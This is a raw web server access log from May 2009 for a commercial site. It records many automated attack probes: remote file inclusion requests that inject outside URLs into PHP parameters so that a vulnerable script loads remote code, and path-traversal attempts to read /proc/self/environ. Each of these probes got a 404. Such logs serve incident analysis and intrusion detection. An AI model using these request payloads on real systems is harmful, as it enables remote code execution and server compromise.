67.202.11.155 - - [07/May/2009:21:56:16 -0400] "GET /logs/access_log.Q108070500 HTTP/1.1" 404 224 "-" "AISearchBot (Email: aisearchbot@gmail.com; If your web site doesn't want to be crawled, please send us a email.)"
203.151.217.29 - - [07/May/2009:21:56:22 -0400] "GET /logs/access_log.Q109010300/lostpasswd.php?env[include_prefix]=http://zonadeclientes.com/blood/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.151.217.29 - - [07/May/2009:21:56:22 -0400] "GET /lostpasswd.php?env[include_prefix]=http://zonadeclientes.com/blood/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.151.217.29 - - [07/May/2009:21:56:22 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://zonadeclientes.com/blood/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
93.187.232.189 - - [07/May/2009:21:56:54 -0400] "GET /logs/access_log.Q108101700//include/lib.inc.php?site_path=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.808"
93.187.232.189 - - [07/May/2009:21:57:15 -0400] "GET /logs/access_log.Q108101700//include/lib.inc.php?site_path=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.808"
77.221.130.17 - - [07/May/2009:21:57:19 -0400] "GET /logs/access_log.Q108051700//include/bbs.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
77.221.130.17 - - [07/May/2009:21:57:19 -0400] "GET //include/bbs.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
77.221.130.17 - - [07/May/2009:21:57:19 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
77.221.130.17 - - [07/May/2009:21:57:19 -0400] "GET /logs/access_log.Q108062600//include/bbs.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
72.30.142.94 - - [07/May/2009:21:57:34 -0400] "GET /logs/access_log.Q108061200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.248.106.226 - - [07/May/2009:21:58:30 -0400] "GET /logs/access_log.Q108100900//modules/My_eGallery/public/displayCategory.php?basepath=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
89.248.106.226 - - [07/May/2009:21:58:30 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
89.248.106.226 - - [07/May/2009:21:58:30 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
201.86.123.181 - - [07/May/2009:21:58:57 -0400] "GET /lostpasswd.php?env[include_prefix]=http://zonadeclientes.com/blood/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
201.86.123.181 - - [07/May/2009:21:58:57 -0400] "GET /logs/access_log.Q109010300/lostpasswd.php?env[include_prefix]=http://zonadeclientes.com/blood/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
201.86.123.181 - - [07/May/2009:21:58:57 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://zonadeclientes.com/blood/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
218.38.243.71 - - [07/May/2009:21:59:10 -0400] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.38.243.71 - - [07/May/2009:21:59:11 -0400] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:21:59:24 -0400] "GET /logs/access_log.Q108071500//admin/business_inc/saveserver.php?thisdir=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:21:59:24 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:21:59:24 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:21:59:24 -0400] "GET /logs/access_log.Q108082100//admin/business_inc/saveserver.php?thisdir=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
89.248.106.226 - - [07/May/2009:21:59:32 -0400] "GET /logs/access_log.Q108122800//modules/My_eGallery/public/displayCategory.php?basepath=http://www.instaforms.net//components/Roseid.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
121.254.231.239 - - [07/May/2009:21:59:35 -0400] "GET /logs/errors.php?error=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.254.231.239 - - [07/May/2009:21:59:35 -0400] "GET /errors.php?error=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.254.231.239 - - [07/May/2009:21:59:35 -0400] "GET /logs/access_log.Q108082800/errors.php?error=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:21:59:49 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:21:59:49 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:21:59:49 -0400] "GET /logs/access_log.Q108082100//admin/business_inc/saveserver.php?thisdir=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:21:59:49 -0400] "GET /logs/access_log.Q108071500//admin/business_inc/saveserver.php?thisdir=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [07/May/2009:22:00:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.214.53.125 - - [07/May/2009:22:00:18 -0400] "GET /logs/access_log.Q109030400/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
85.214.53.125 - - [07/May/2009:22:00:18 -0400] "GET /appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
85.214.53.125 - - [07/May/2009:22:00:18 -0400] "GET /logs/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 219 "-" "libwww-perl/5.803"
212.59.11.66 - - [07/May/2009:22:00:35 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:00:35 -0400] "GET /logs/access_log.Q108062800//admin/classes/TplLoad.php?full_path_to_public_program=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:00:35 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
85.214.53.125 - - [07/May/2009:22:00:38 -0400] "GET /logs/access_log.Q108082100/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
212.59.11.66 - - [07/May/2009:22:00:56 -0400] "GET /logs/access_log.Q108102500//admin/classes/TplLoad.php?full_path_to_public_program=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
84.54.137.9 - - [07/May/2009:22:01:15 -0400] "GET /errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
84.54.137.9 - - [07/May/2009:22:01:15 -0400] "GET /logs/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.54.137.9 - - [07/May/2009:22:01:15 -0400] "GET /logs/access_log.Q108111600/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:01:43 -0400] "GET /logs/access_log.Q108070800//PhpLinkExchange/bits_listings.php?svr_rootP=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.811"
212.59.11.66 - - [07/May/2009:22:01:43 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
212.59.11.66 - - [07/May/2009:22:01:43 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.811"
212.59.11.66 - - [07/May/2009:22:01:43 -0400] "GET /logs/access_log.Q108062100//PhpLinkExchange/bits_listings.php?svr_rootP=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.811"
121.254.231.239 - - [07/May/2009:22:01:44 -0400] "GET /logs/access_log.Q108082800%20%20/errors.php?error=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.151.217.29 - - [07/May/2009:22:02:17 -0400] "GET /logs/access_log.Q109010300%20%20/lostpasswd.php?env[include_prefix]=http://zonadeclientes.com/blood/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:02:37 -0400] "GET /logs/access_log.Q108111600/errors.php?error=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:02:38 -0400] "GET /logs/errors.php?error=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:02:38 -0400] "GET /errors.php?error=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.254.231.239 - - [07/May/2009:22:02:39 -0400] "GET /logs/access_log.Q108082900%20%20/errors.php?error=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.151.217.29 - - [07/May/2009:22:02:48 -0400] "GET /logs/access_log.Q108111600%20%20/lostpasswd.php?env[include_prefix]=http://zonadeclientes.com/blood/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:02:53 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:02:53 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:02:53 -0400] "GET /logs/access_log.Q108062800//admin/classes/TplLoad.php?full_path_to_public_program=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:02:53 -0400] "GET /logs/access_log.Q108102500//admin/classes/TplLoad.php?full_path_to_public_program=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
68.109.233.157 - - [07/May/2009:22:03:04 -0400] "GET /logs/access_log.Q108051700%20//appserv/main.php?appserv_root=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
68.109.233.157 - - [07/May/2009:22:03:04 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 220 "-" "libwww-perl/5.79"
72.30.142.94 - - [07/May/2009:22:03:06 -0400] "GET /logs/error_log.Q107120300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.249.36.194 - - [07/May/2009:22:03:08 -0400] "GET /errors.php?error=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:03:08 -0400] "GET /logs/errors.php?error=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:03:08 -0400] "GET /logs/access_log.Q108111600/errors.php?error=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.125.64.38 - - [07/May/2009:22:03:18 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
116.121.201.70 - - [07/May/2009:22:03:30 -0400] "GET /logs/error_log.Q109012000//appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 241 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
116.121.201.70 - - [07/May/2009:22:03:30 -0400] "GET //appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 215 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
116.121.201.70 - - [07/May/2009:22:03:31 -0400] "GET //appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.65"
116.121.201.70 - - [07/May/2009:22:03:52 -0400] "GET /logs/error_log.Q109012000//appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
116.121.201.70 - - [07/May/2009:22:03:52 -0400] "GET //appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.65"
116.121.201.70 - - [07/May/2009:22:03:53 -0400] "GET /logs//appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.65"
210.118.194.225 - - [07/May/2009:22:04:02 -0400] "GET /logs/error_log.Q109012000//appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.813"
210.118.194.225 - - [07/May/2009:22:04:08 -0400] "GET //appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.813"
210.118.194.225 - - [07/May/2009:22:04:13 -0400] "GET /logs//appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.813"
97.122.119.169 - - [07/May/2009:22:04:23 -0400] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
97.122.119.169 - - [07/May/2009:22:04:23 -0400] "GET /images/login_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
97.122.119.169 - - [07/May/2009:22:04:25 -0400] "GET /images/login_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
97.122.119.169 - - [07/May/2009:22:04:25 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
212.59.11.66 - - [07/May/2009:22:04:39 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
212.59.11.66 - - [07/May/2009:22:04:39 -0400] "GET /logs/access_log.Q108122400//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
212.59.11.66 - - [07/May/2009:22:04:39 -0400] "GET /logs/access_log.Q108122800//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
212.59.11.66 - - [07/May/2009:22:04:42 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
212.59.11.66 - - [07/May/2009:22:04:43 -0400] "GET /logs/access_log.Q108122400//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
212.59.11.66 - - [07/May/2009:22:04:43 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
212.59.11.66 - - [07/May/2009:22:04:43 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
212.59.11.66 - - [07/May/2009:22:04:43 -0400] "GET /logs/access_log.Q108122800//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
212.59.11.66 - - [07/May/2009:22:04:51 -0400] "GET /logs/access_log.Q108062800%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:04:51 -0400] "GET /logs/access_log.Q108102500%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
84.54.137.9 - - [07/May/2009:22:04:57 -0400] "GET /logs/access_log.Q108111600%20%20/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [07/May/2009:22:05:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [07/May/2009:22:06:26 -0400] "GET /logs/access_log.Q108111600%20%20/errors.php?error=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.254.231.239 - - [07/May/2009:22:06:29 -0400] "GET /auto.php?inc=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
121.254.231.239 - - [07/May/2009:22:06:29 -0400] "GET /logs/auto.php?inc=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
84.54.137.9 - - [07/May/2009:22:06:38 -0400] "GET /logs/access_log.Q108060700%20%20/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.121.201.70 - - [07/May/2009:22:06:46 -0400] "GET /logs/error_log.Q109012000//appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
116.121.201.70 - - [07/May/2009:22:06:46 -0400] "GET //appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.65"
116.121.201.70 - - [07/May/2009:22:06:47 -0400] "GET /logs//appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.65"
216.246.55.235 - - [07/May/2009:22:07:05 -0400] "GET /errors.php?error=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.246.55.235 - - [07/May/2009:22:07:06 -0400] "GET /logs/errors.php?error=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.246.55.235 - - [07/May/2009:22:07:06 -0400] "GET /logs/access_log.Q108081600/errors.php?error=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.17 - - [07/May/2009:22:07:12 -0400] "GET /logs/access_log.Q108062600%20//include/bbs.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
216.246.55.235 - - [07/May/2009:22:07:27 -0400] "GET /logs/access_log.Q108080800/errors.php?error=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.142.94 - - [07/May/2009:22:07:36 -0400] "GET /logs/access_log.Q109011900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.59.11.66 - - [07/May/2009:22:07:38 -0400] "GET /logs/access_log.Q108082100%20%20//admin/business_inc/saveserver.php?thisdir=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:07:38 -0400] "GET /logs/access_log.Q108071500%20%20//admin/business_inc/saveserver.php?thisdir=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:08:02 -0400] "GET /logs/access_log.Q108111600%20%20/errors.php?error=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.234.200.183 - - [07/May/2009:22:08:19 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
200.234.200.183 - - [07/May/2009:22:08:19 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
200.234.200.183 - - [07/May/2009:22:08:20 -0400] "GET /logs/errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
200.234.200.183 - - [07/May/2009:22:08:20 -0400] "GET /errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
200.234.200.183 - - [07/May/2009:22:08:20 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 239 "-" "XXXXXX"
200.234.200.183 - - [07/May/2009:22:08:20 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 234 "-" "XXXXXX"
200.234.200.183 - - [07/May/2009:22:08:20 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 239 "-" "XXXXXX"
200.234.200.183 - - [07/May/2009:22:08:20 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "XXXXXX"
66.249.72.114 - - [07/May/2009:22:08:25 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
200.32.100.130 - - [07/May/2009:22:08:37 -0400] "GET /errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.32.100.130 - - [07/May/2009:22:08:37 -0400] "GET /logs/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.32.100.130 - - [07/May/2009:22:08:37 -0400] "GET /logs/access_log.Q108111600/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.64.202.134 - - [07/May/2009:22:08:37 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
208.64.202.134 - - [07/May/2009:22:08:37 -0400] "GET /logs/access_log.Q108090900%20%20//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
208.64.202.134 - - [07/May/2009:22:08:37 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
58.246.90.42 - - [07/May/2009:22:08:37 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; GTB6; .NET CLR 2.0.50727)"
58.246.90.42 - - [07/May/2009:22:08:37 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; GTB6; .NET CLR 2.0.50727)"
208.64.202.134 - - [07/May/2009:22:08:40 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
208.64.202.134 - - [07/May/2009:22:08:40 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
208.64.202.134 - - [07/May/2009:22:08:40 -0400] "GET /logs/access_log.Q108090900%20%20//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.246.90.42 - - [07/May/2009:22:08:47 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; GTB6; .NET CLR 2.0.50727)"
58.246.90.42 - - [07/May/2009:22:08:47 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; GTB6; .NET CLR 2.0.50727)"
203.151.217.29 - - [07/May/2009:22:09:28 -0400] "GET /logs/access_log.Q108111600/lostpasswd.php?env[include_prefix]=http://zonadeclientes.com/blood/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:09:33 -0400] "GET /logs/access_log.Q108082100%20%20//admin/business_inc/saveserver.php?thisdir=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:09:33 -0400] "GET /logs/access_log.Q108071500%20%20//admin/business_inc/saveserver.php?thisdir=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.30.142.94 - - [07/May/2009:22:09:54 -0400] "GET /logs/access_log.Q107102300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.59.11.66 - - [07/May/2009:22:09:59 -0400] "GET /logs/access_log.Q108102500%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
